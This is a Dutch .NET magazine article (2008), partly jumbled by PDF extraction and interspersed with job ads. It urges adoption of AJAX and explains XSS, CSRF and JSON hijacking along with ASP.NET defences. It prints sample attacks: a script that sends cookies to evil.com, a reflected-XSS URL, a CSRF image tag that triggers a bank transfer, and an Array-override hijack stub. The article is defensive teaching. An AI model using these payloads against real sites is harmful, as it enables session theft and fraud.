AJAX niet meer weg te denken

Document Sample
AJAX niet meer weg te denken Powered By Docstoc
					                          Techniek




AJAX niet meer weg te denken
                          In dit artikel laten we de niet-overtuigde ontwikkelaar zien dat het gebruik
                          van JavaScript en AJAX de moeite waard is en zeer veel toegevoegde waarde
                          biedt. Met als ondersteuning goedbeargumenteerde en gepassioneerde
                          (code)voorbeelden.


Het gebruik van AJAX in                              gebruik van patterns, als prototype en intercep-       kende feature in Visual Studio tot dusver. Met
webapplicaties is de laatste tijd in populariteit    tor, zeer succesvol toegepast. Het framework is        de komst van Visual Studio 2008 behoort dit
toegenomen. Hierdoor wordt kennis van Java-          zeer stabiel en biedt veel mogelijkheden (zowel        tot het verleden. JavaScript intellisense in Visual
Script belangrijker. Toch bestaat er weerstand       server- als client-centric).                           Studio 2008 omvat: keyword-ondersteuning, de
tegen JavaScript. Ontwikkelaars die werken in                                                               types van de variabelen worden achterhaald en
C# of VB.NET zijn gecharmeerd van design             Weerstand                                              getoond, ondersteuning van methodes en pro-
patterns en Software Factories. Een non-type-        Wij hebben altijd de mening gehad dat Java-            perties ongeacht of deze zich inline in de pagina
safe scripttaal steekt daar nogal bleek bij af.      Script helpt ons doel, een gebruiksvriendelijke        bevinden of in externe scriptbestanden waarnaar
Asynchronous JavaScript And XML – tegen-             webapplicatie, te bereiken. Met de komst van
woordig is AJAX veel meer dan de titel zegt.         AJAX, en met name het ASP.NET AJAX
Eigenlijk betekent AJAX momenteel gebruiks-
vriendelijkheid in webapplicaties. De ‘X’ van XML
                                                     Framework1, vinden wij dan ook dat iedere
                                                     (Microsoft) Webontwikkelaar niet meer om
                                                                                                            Maar XSS kan wel
zouden we beter kunnen vervangen door een            JavaScript (lees AJAX) heen kan. In de samen-          degelijk een groot
verwijzing naar JSON, het lichte data-interchange    werking met C#- en VB.NET-ontwikkelaars
formaat. JSON wordt standaard gebruikt voor de       is ons opgevallen dat de meesten niets met               gevaar betekenen
communicatie tussen JavaScript en een AJAX-          JavaScript te maken willen hebben. De redenen
endpoint. Het is eenvoudig te begrijpen en biedt     hiervoor verschillen, maar de meest gehoorde
een volledig taalonafhankelijk tekstformaat.         argumenten zijn:                                       verwezen is in de pagina. JavaScript coderen gaat
Het gebruikt conventies die bekend zijn voor         - lastig te debuggen                                   in Visual Studio 2008 dus net zo gemakkelijk als
ontwikkelaars die werken met de C-familie van        - geen intellisense                                    het schrijven van C# of VB.NET
ontwikkeltalen, zoals C, C++, C# en Java. De ’J’     - security slecht
van JavaScript spreekt voor zich. JavaScript is nu   - browser-versie compatibiliteit.                      Security
eenmaal dé manier om applicaties in een browser                                                             Security is een veel voorkomende angst van
gebruiksvriendelijker te maken.                      JavaScript debugging                                   ontwikkelaars en opdrachtgevers wanneer we
JavaScript is daarmee een programmeertaal            Op het gebied van debugging heeft JavaScript een       verantwoordelijkheden van de server ver-
voor algemeen gebruik, ontworpen om pro-             achterstand goed te maken. Hoewel debuggen van         plaatsen naar de client. In onze ogen is dit een
grammeurs van alle competentieniveaus het ge-        JavaScript in eerdere versie van het .NET Frame-       onderwerp dat uitleg verdient. Dit onderwerp
drag van softwareobjecten te laten controleren.      work mogelijk was, bleek het niet krachtig en          wordt vaak gebruikt om het toepassen van
Vandaag de dag wordt JavaScript vooral               intuïtief genoeg. Firebug gold als een veel gebruikt   AJAX van tafel te vegen zonder de details te
gebruikt in webapplicaties, waarvan de objecten      alternatief, maar werkt alleen met Firefox.            onderkennen.
een grote variëteit aan HTML-objecten van            Met de komst van Microsoft Visual Studio
een webpagina en natuurlijk de pagina zelf           2008 (VS2008) heeft er een grote verbete-              Aan wat voor securityproblemen moeten we
representeren. Als grote voordeel geldt dat          ring plaatsgevonden: JavaScript-debugging              denken bij gebruik van AJAX?
de gebruiker de webapplicatie interactief kan        is nu standaard beschikbaar. Het zetten van            - Cross site Scripting (XSS of CSS)
gebruiken, omdat de applicatie de pagina niet        breakpoints, (deep) watch, locals, call stack          - Cross-site request forgery (CSRF of XSRF)
naar de server hoeft te posten                       en on-the-fly uitvoeren van code is allemaal            - JSON Hijacking
                                                     mogelijk, zodra je in Internet Explorer disable
JavaScript binnen Microsoft                          JavaScript debugging uitvinkt. Niet alleen             Natuurlijk bestaan er meer veiligheidsoverwe-
Volgens Nikhil Kothari (van de ASP.NET               inline-JavaScript, maar ook externe libraries en       gingen, maar dit zijn echte AJAX-veiligheids-
productgroep) heeft het .NET Framework-              .js-bestanden worden ondersteund.                      kwesties.
team van Microsoft zich net als de rest van de
wereld schuldig gemaakt aan het ‘hacken’ met         Intellisense
JavaScript tot de komst van het ASP.NET              Binnen Visual Studio zijn .NET-ontwikkelaars
                                                                                                            1. Cross Site Scripting
AJAX Framework. Pas op dat moment zijn zij           verwend met het gebruik van intellisense. Dit             (XSS)
zich er echt in gaan verdiepen waar JavaScript       gemak valt helemaal op bij het schrijven van
nu precies voor staat en waar het goed in is.        JavaScript. Dan merken we pas hoe enorm                We kennen allemaal de voorbeelden van het
In het ASP.NET AJAX Framework wordt het              gemakkelijk intellisense is. Dit was een ontbre-       invoegen van JavaScript of sql statements in een



                                                                                .NET magazine | nummer 22 2008                                              51
                                                                                        the one-stop company for .NET development


4DotNet is op zoek naar een

 Microsoft .NET Developer (medior)
Ben jij een ambitieuze, ervaren ontwikke-   Onze professionele trainingen in onze
laar, die met ons de uitdaging wil          trainingscentra Meppel en Utrecht staan
aangaan om het maximale uit jouw            tot je beschikking.
capaciteiten te halen? Neem dan direct
contact met ons op voor een afspraak.       º Uitstekend salaris
                                            º Leaseauto met klasse, merk naar keuze
Wie zijn wij?:                              º Laptop en mobiele telefoon
4DotNet is een onderneming voor             º Bonus bij het behalen Microsoft
ambitieuze ontwikkelaars. Door onze           certificeringen
specialisatie in Microsoft Development
Tools en Microsoft .NET behoren onze        Wat vragen wij:
medewerkers tot de top van Nederland.       º Een zelfstandige werkhouding
Onze klanten ondersteunen wij met           º Ambitie en leergierigheid                              Geïnteresseerd?
trainingen gegeven door onze Microsoft      º Analytisch vermogen                                    Neem dan contact op met Edgar Tichelaar,
gecertificeerde trainers, detachering,      º HBO / WO                                               0522-24 14 48 of e-mail je CV naar EdgarT@4dotnet.nl
consultancy, maatwerk, onderhoud en         º Ervaring met projecten binnen het                      voor een vrijblijvend gesprek over jouw carrière
een gratis helpdesk.                          Microsoft .NET Framework
                                            º Ruime ervaring met Visual Studio, C# of
                                                                                                     mogelijkheden.
Wat bieden wij?:                              VB.NET, ASP.NET, SQL
Een uitstekend salaris met prima
secundaire arbeidsvoorwaarden en een        Pre's
uitdagende functie in een informele         º Kennis van XML, Team Foundation
no-nonsense cultuur. Daarbij krijg je         Server
uitstekende mogelijkheden om jezelf         º Een of meer Microsoft (MCAD MCSD
verder te ontwikkelen en te certificeren.     MCTS MCPD of MCT) certificeringen.




                                                                                                                                     Verleng uw abonnement op
                                                                                        Microsoft .Net Magazine


                                                                                                                                     Wilt u het .Net magazine
                                                                                        Just refreshed


                                                                                        .net
                                                                                                                                                                /netjesgeregeld
                                                                                                                                     blijven ontvangen?
  Microsoft .Net Magazine                                                               even                                                                    microsoft.nl
  Just refreshed
                                                                                        spannender
  .net
  even
  actueler



Wilt u het .Net magazin
                        e
blijven ontvangen?
Verleng uw abonnemen
                       t op
microsoft.nl/netjesge
                         regeld
textbox op een webpagina om na te gaan of de
                                                                                                          <%@ Page Language=”C#”
ontwikkelaar iets gedaan heeft aan het tegen-                                                             validateRequest=”true”
gaan van SQL Injection of Cross Site Scripting
(XSS). In het geval van XSS is het bekende                                                               CODEVOORBEELD 4
voorbeeld het plaatsen van de volgende string in
een textbox en het klikken op de submit-knop.                                                            Wanneer validateRequest op true staat (stan-
                                                                                                         daard), zal XSS niet werken. Bij uitvoeren van
 <script>alert(‘xss’);</script>
                                                                                                         de voorbeelden verschijnt de melding die je ziet
                                                                                                         in afbeelding 3.
CODEVOORBEELD 1                                     AFBEELDING 2. INHOUD COOKIE BEKENDE WEBSITE



Stel: op een website is de functionaliteit aanwe-   te injecteren, is het theoretisch mogelijk een
zig om naar boeken te zoeken. Het is mogelijk       nieuw loginscherm te plaatsen en de gegevens
een zoekterm in te voeren, de website toont de      naar de aanvaller te sturen. De mogelijkheden
zoekterm bij het resultaat.                         zijn eindeloos, omdat een aanvaller gebruik kan
Wanneer we de bekende test doen, kan dat            maken van alle faciliteiten die JavaScript en
het resultaat opleveren die je terugvindt in        HTML hem bieden.
afbeelding 1.
                                                    Dit soort scenario’s zullen echter alleen de aan-
Het doel van een XSS-aanval is om geïnjec-          valler zelf benadelen, het is immers zijn brow-
                                                    ser waar deze aanvallen op plaatsvinden. Om          AFBEELDING 3. A POTENTIALLY DANGEROUS REQUEST.
                                                    echt schade te doen, zal hij een manier moeten       FORM VALUE WAS DETECTED FROM THE CLIENT
                                                    vinden om andere gebruikers deze technieken
                                                    uit te laten voeren. Dit is mogelijk door middel     Het is dan ook geen goed idee om deze di-
                                                    van reflected XSS en stored XSS.                      rective op false te zetten. Denk goed na of dit
                                                                                                         echt is wat je wilt, mocht het ooit noodzakelijk
                                                    Reflected XSS                                         zijn. Zorg er in ieder geval voor om bij alle
                                                    De eerste methode is Reflected XSS. Dit houdt         gebruikersinvoer gebruik te maken van Server.
                                                    in dat de te injecteren content als QueryString      HtmlEncode, zodat mogelijk onveilige karak-
                                                    in een URL wordt meegegeven. De gebruiker            ters onschadelijk worden gemaakt met behulp
                                                    (slachtoffer) wordt dusdanig voor de gek te           van hun HTML-encoded equivalenten.
                                                    houden dat hij/zij op de link klikt.
AFBEELDING 1. RESULTAAT CROSS SITE SCRIPTING
                                                                                                          string searchTerm = Server.
                                                                                                          HtmlEncode(TextBox1.Text);
                                                     http://boekhandel.nl/zoek.aspx?zoekterm=<s
teerde code op de aangevallen site uit te voeren.    cript>alert(‘xss’);</script>
In het voorbeeld ongevaarlijk, omdat het een                                                             CODEVOORBEELD 5
dialoog toont. Maar XSS kan wel degelijk een        CODEVOORBEELD 3
groot gevaar betekenen. Wat te denken van het
stelen van cookies? Laten we deze site nogmaals     Om een slachtoffer zover te krijgen op deze link
                                                                                                         2. Cross-site request
‘aanvallen’, alleen ditmaal met de volgende         te klikken maakt men gebruik van ‘social engi-          forgery (CSRF)
zoekterm:                                           neering’ (psychologische trucs). Bijvoorbeeld
                                                    een e-mail met de boodschap dat iemand iets          Cross-site request forgery geldt als een lastig aan
                                                    gewonnen heeft en op de link moet klikken om         te pakken fenomeen en kan in combinatie met
 <script>document.location=’http://evil.
 com/collector.php?cookie=’ + document.coo-
                                                    de prijs ook daadwerkelijk te krijgen.               Cross site scripting een groot gevaar vormen.
 kie</script>                                                                                            Het is zo lastig aan te pakken omdat het verzoek
                                                    Stored XSS                                           wordt uitgevoerd onder de naam van het slacht-
CODEVOORBEELD 2                                     Bij Stored XSS zal de aanvaller zelf het kwaad-      offer. Je kunt dus niet aan het verzoek zien dat
                                                    willige script in een webpagina opslaan. Alle        het niet klopt. Zoals bij XSS al duidelijk werd, is
Wanneer de browser nu de pagina rendert,            bezoekers van de aangevallen site worden er de       het mogelijk om sessions of cookies te stelen en
stuurt de JavaScript-code de inhoud van de          dupe van. Een aanvaller kan elke site gebruiken      je voor te doen als een ander persoon. Bij CRSF
huidige cookie naar evil.com, zonder dat iemand     waarbij hij zelf teksten of plaatjes toevoegt, zo-   doet de hacker zich ook voor als het slachtoffer.
het doorheeft. Doordat het niet ongewoon            als een wiki of een blog met commentaar. Het         Dit is alleen mogelijk wanneer het slachtof-
is om sessionid’s en authenticatie tokens in        spreekt voor zich dat deze methode gevaarlijker      fer twee verschillende sites tegelijk open heeft,
cookies op te slaan, bestaat de mogelijkheid dat    is dan reflected XSS, omdat het geen social           bijvoorbeeld een forum en een website van een
de aanvaller zich door een succesvolle cookie-      engineering nodig heeft en het slachtoffer alleen     bank. Het slachtoffer is ingelogd op de website
diefstal uit kan geven voor de gedupeerde (zie      de site hoeft te bezoeken.                           van de bank en heeft tevens het forum openstaan
afbeelding 2).                                                                                           in een ander browservenster. Op de forumpagina
                                                    ASP.NET oplossing                                    bevindt zich de volgende afbeelding:
De aanvaller beschikt over nog meer interes-        Het is voor de XSS-aanvallers van ASP.NET-
                                                                                                          <img src=http://www.bank.com/manageac-
sante mogelijkheden. Doordat XSS gebruikt           websites niet meer zo eenvoudig. In ASP.NET           count.aspx?transferTo=123&amount=1000 />
kan worden om zowel JavaScript als HTML             kennen we de validateRequest Page Directive:
                                                                                                         CODEVOORBEELD 6




                                                                              .NET magazine | nummer 22 2008                                             53
                                JavaScript is
                            steeds makkelijker toe te passen
Bij het opvragen van de afbeelding vindt er op                                                           die gerealiseerd zijn met het ASP.NET AJAX
                                                     Function Array()
de site van bank.com een transfer plaats van         {
                                                                                                         framework accepteren alleen webservice calls
1000 euro naar bankrekening 123. Daarbij                 var copyOfArray = this;                         vanuit JavaScript die voorzien zijn van een header
wordt het gevalideerde authenticatie cookie van                                                          met content type application/json. Dit wordt ge-
                                                          var sendArray = function()
het slachtoffer gebruikt.                                  {
                                                                                                         realiseerd door het framework aan de client-kant
                                                            //Stuur array naar de hacker                 (zie codevoorbeeld 9). Wanneer er een verzoek
Geen diefstal dus van de cookie of een session            }                                              vanuit een scripttag wordt verstuurd, zal het
maar tijdelijk gebruik ervan om een actie uit te          // Wacht even met het aanroepen van de
                                                                                                         niet het content-type application/json bevatten,
voeren. Je begrijpt dat de kans dat je slachtoffer         sendArray function zodat je zeker              waardoor de webservice het verzoek negeert.
van CSRF wordt erg klein is, omdat je twee ver-           // dat er een volledige kopie van de
                                                          array is gemaakt.
schillende sites open moet hebben staan. En de            setTimeout(sendArray,100);                      // Create a web request to make the method
hacker moet toevallig ook jouw bank aanvallen.       }                                                    call
De eindgebruiker kan CSRF dus simpelweg                                                                   var request = new Sys.Net.WebRequest();

voorkomen door bijvoorbeeld bankzaken alleen        CODEVOORBEELD 8
                                                                                                          request.get_headers()[‘Content-Type’] =
te regelen met maar één browsertab open. De                                                               ‘application/json; charset=utf-8’;
oplossing voor CSRF die een ontwikkelaar kan        (stap 3) van onlinestore.com. Deze aanroep geeft
toepassen, bespreken we hierna.                     een JSON array terug (stap 4).                       CODEVOORBEELD 9
                                                    Doordat in de HTML-pagina van jsonhijack.
                                                    com de function Array wordt overschreven, zal        Daarnaast zijn alle ter beschikking staande web-
3. JSON Hijacking                                   de javascript interpreter deze aanroepen om de       methods door middel van het ASP.NET AJAX
De term JSON Hijacking kom je veel tegen            JSON Array te verwerken. Binnen deze functie         framework standaard alleen te benaderen met
bij AJAX Security. Scott Guthrie (corporate         maakt de hacker een kopie van de JSON Array          de HTTP POST-opdracht. Aanroepen vanuit
vice president van Microsoft’s .NET Developer       en stuurt deze door naar de website van de           JavaScript worden uitgevoerd met de HTTP
Division) heeft er een post aan gewijd om te        hacker (stap 5).                                     GET-opdracht, zoals te zien in codevoorbeeld
bewijzen dat het ASP.NET AJAX framework                                                                  10. Een ontwikkelaar kan er voor kiezen een
een oplossing biedt voor dit securityprobleem2.     JSON Hijacking is een serieus beveiligingsrisico.    webmethod wel beschikbaar te stellen voor
JSON Hijacking is een beveiligingsprobleem          De kans dat een eindgebruiker hiervan slachtoffer     HTTP GET-verzoeken, maar dan moet hij ex-
dat veel overeenkomsten vertoont met Cross-         wordt blijft echter beperkt, omdat de eindgebrui-    pliciet een attribuut boven de webmethod zetten.
site request forgery. JSON Hijacking bestaat        ker minstens twee websites open moet hebben
uit twee onderdelen, namelijk een manier om         staan, waarvan één kwaadwillende. En deze dient
                                                                                                          [WebMethod]
ongemerkt een AJAX-endpoint (bijvoorbeeld           ook nog een aanroep te doen naar de andere web-       public string[] GetHistory()
een AJAX enabled webservice) te benaderen en        site waar de eindgebruiker is ingelogd. De kans       {
                                                                                                              //Method te benaderen met HTTP POST
een manier om de binnenkomende JSON array           dat de kwaadwillende website een aanroep doet
                                                                                                          verb
(geordende collectie van waardes) te verzenden      naar de website waar de eindgebruiker dan ook         }
naar een hacker.                                    toevallig is ingelogd, is klein maar voor bepaalde
                                                                                                          [WebMethod]
Een manier om ongemerkt een Ajax-endpoint           toepassingen niet te verwaarlozen.
                                                                                                          [ScriptMethod(UseHttpGet = true)]
te benaderen, is door gebruik te maken van de       Omdat JSON Hijacking volledig wordt                   public string[] GetHistory()
volgende javascripttag:                             uitgevoerd vanaf de website van een hacker en         {
                                                                                                              //Method te benaderen met HTTP GETT
                                                    je daar geen invloed op kan uitoefenen, dien je
                                                                                                              verb
                                                    de oplossing te zoeken bij de bouw van je eigen       }
 <Script src=”http://www.onlinestore.com/
 storeinfo/getHistory.ashx” ></Script>              webservice. Dit geldt ook voor CSRF. Micro-
                                                    soft heeft hier een oplossing voor: Webservices      CODEVOORBEELD 10

CODEVOORBEELD 7

                                                                                                         Dit betekent dus dat Microsoft twee manieren
Wanneer deze aanroep een JSON array terug-                                                               heeft om ontwikkelaars van AJAX-enabled
geeft, moet deze nog doorgestuurd worden naar                                                            websites te beschermen tegen JSON Hijacking.
de hacker. Dit doe je door de JavaScript-functie                                                         We hebben nu een drietal beveiligingsproble-
Array() te overschrijven. In codevoorbeeld 2 is                                                          men besproken die allemaal te verhelpen zijn.
te zien hoe dit gaat.                                                                                    Wij willen alle beginnende AJAX-ontwikke-
                                                                                                         laars er dan ook bewust van maken dat AJAX
In afbeelding 4 is schematisch te zien hoe                                                               de ‘attack surface’ van je applicatie vergroot. Zie
JSON Hijacking verloopt. Stap 1 bestaat uit                                                              niet alleen de mooie voordelen, maar bedenk
een request naar de website van de hacker. In                                                            ook welke gaten je eventueel opent. Wanneer je
stap 2 retourneert de server een HTML-pagina                                                             hier goed rekening mee houdt, is het absoluut
waarin een plaatje is verwerkt die een aanroep      AFBEELDING 4. SCHEMATISCHE WEERGAVE VAN JSON-        mogelijk een veilige AJAX-enabled webap-
doet naar het AJAX endpoint getHistory.ashx         HIJACKING                                            plicatie te realiseren. Een tip die regelmatig



54                                 .NET magazine | nummer 22 2008
                 Beveiligingsproblemen goed
                     te verhelpen
terugkeert bij beveiligingskwesties, is “valideer     Conclusie                                              Links
de input van de gebruiker”. Er zijn specialisten      In dit artikel hebben we een aantal punten be-         1 ASP.NET AJAX
die beweren dat je daarmee 80 procent van het         handeld waarvan wij denken dat zij de belang-            http://www.asp.net/ajax
problemen verhelpt.                                   rijkste drempels vormen voor .NET-onwikke-             2 Scott Guthrie: ASP.NET AJAX and JSON-Hijacking
                                                      laars om geen JavaScript of AJAX te gebruiken.           http://weblogs.asp.net/scottgu/ar-
Browser-versie compatibiliteit                        Het web maakt een enorme ontwikkeling door               chive/2007/04/04/json-hijacking-and-how-asp-net-
Bij gebruik van ASP.NET AJAX vormt de                 en JavaScript is steeds makkelijker toe te pas-          ajax-1-0-mitigates-these-attacks.aspx
browser waarmee gebruikers je applicatie be-          sen: VS2008 heeft intellisense voor JavaScript
naderen geen echt probleem meer (wat AJAX             en goede debug-functionaliteit toegevoegd. De
betreft).                                             beveiligingsproblemen die spelen zijn met het
De volgende browsers worden officieel onder-            ASP.NET AJAX Framework onder de loep
steund:                                               genomen en zijn goed te verhelpen. Een ont-
- Microsoft Internet Explorer 6.0 of later            wikkelaar moet gewoon JavaScript gebruiken
- Mozilla Firefox version 1.5 of later                in zijn websites om een bezoeker een prettige
- Opera version 9.0 of later                          gebruikerservaring te bieden.
- Apple Safari version 2.0 of later
ASP.NET AJAX detecteert het type browser
van de gebruiker. Afhankelijk van de browser
wordt JavaScript-code uitgevoerd die geschikt                                                                Dennis van de Laar (dennis.van.de.laar@avanade.
is voor deze specifieke browser.                                                                              com) en Henry Cordes (henry.cordes@avanade.
                                                                                                             com) zijn solution developer bij Avanade (www.avanade.
                                                                                                             com), een samenwerkingsverband tussen Microsoft en
                                                                                                             Accenture.


                                                                         (Advertentie)




                                                                         SPIE
                                                                         doet meer
                                                                         voor je!




     Jij wilt het beste uit jezelf halen?
     Wij zorgen dat je de beste opleidingen volgt.
     Als .Net Specialist ben je nooit uitgeleerd. Ontwikkelingen op de voet volgen is een drive die wij verlangen. Daarom
     zorgen wij ervoor dat je maximaal gebruik maakt van onze uitstekende opleidingstrajecten en themasessies. Wij maken
     specialisten in Sharepoint, Bizztalk en het Framework 3.5. Toppers laten wij excelleren. Wil je weten wat SPIE nog meer
     te bieden heeft, kijk op www. SPIE-ICT.nl




                                                                                 .NET magazine | nummer 22 2008                                                   55
Welke ICT’er komt het betalingsverkeer regelen?

Information Engineer – Junior RUP Specialist
Net als het gewone verkeer moet ook het betalingsverkeer goed geregeld zijn. Equens is een
van de grootste en meest toonaangevende betalingsverwerkers van Europa. Werken bij Equens
betekent dan ook werken met geavanceerde technologie. Samen met collega’s die over een
schat aan kennis en ervaring beschikken, zorg je ervoor dat onze solide IT-systemen voldoen
aan de nieuwste Europese standaarden. Zo kun je je kennis verdiepen en verbreden
en een concrete bijdrage leveren aan onze ambitie om tot de Europese top 3 te behoren.
Jouw toegevoegde waarde zit hem met name in je (nog te ontwikkelen) kennis van RUP.
Profiel: hbo Informatica. Ervaring met Requirements Engineering, RUP en Functional Design.
Bij Equens werk je 4 x 9 uur met een salaris van max. € 51.000 bruto per jaar. Kijk voor meer
informatie op www.werkenbijequens.com




Microsoft .Net Magazine                                                                              Microsoft .Net Magazine
Just refreshed                                                                                       Just refreshed




.net                                                                                                 .net
even                                                                                                 even
sceptischer                                                                                          lekkerder

                                                                                   Wilt
                                                                                         u
                                                                                  blijv het .N
                                                                                       e            e
                                                                                 Verle n ontv t maga
                                                                                       ng u ange           zine
                                                                                                       n
                           zine                                                 mic
                                                                                             wa
                                                                                                  bon ?
                       aga                                                          roso              nem
                    tm
                 .Ne en?         t op                                                      f t.n          ent
              het ang       men             d                                                    l/           op
         tu
      Wil n ontv bonne                  gel                                                      netj
                                    ere                                                                 esg
                               jesg
            e       a                                                                                         ereg
       blijv ng uw
        Ver
            le
                      nl/ net                                                                                        eld
                        .
                   soft
          m   icro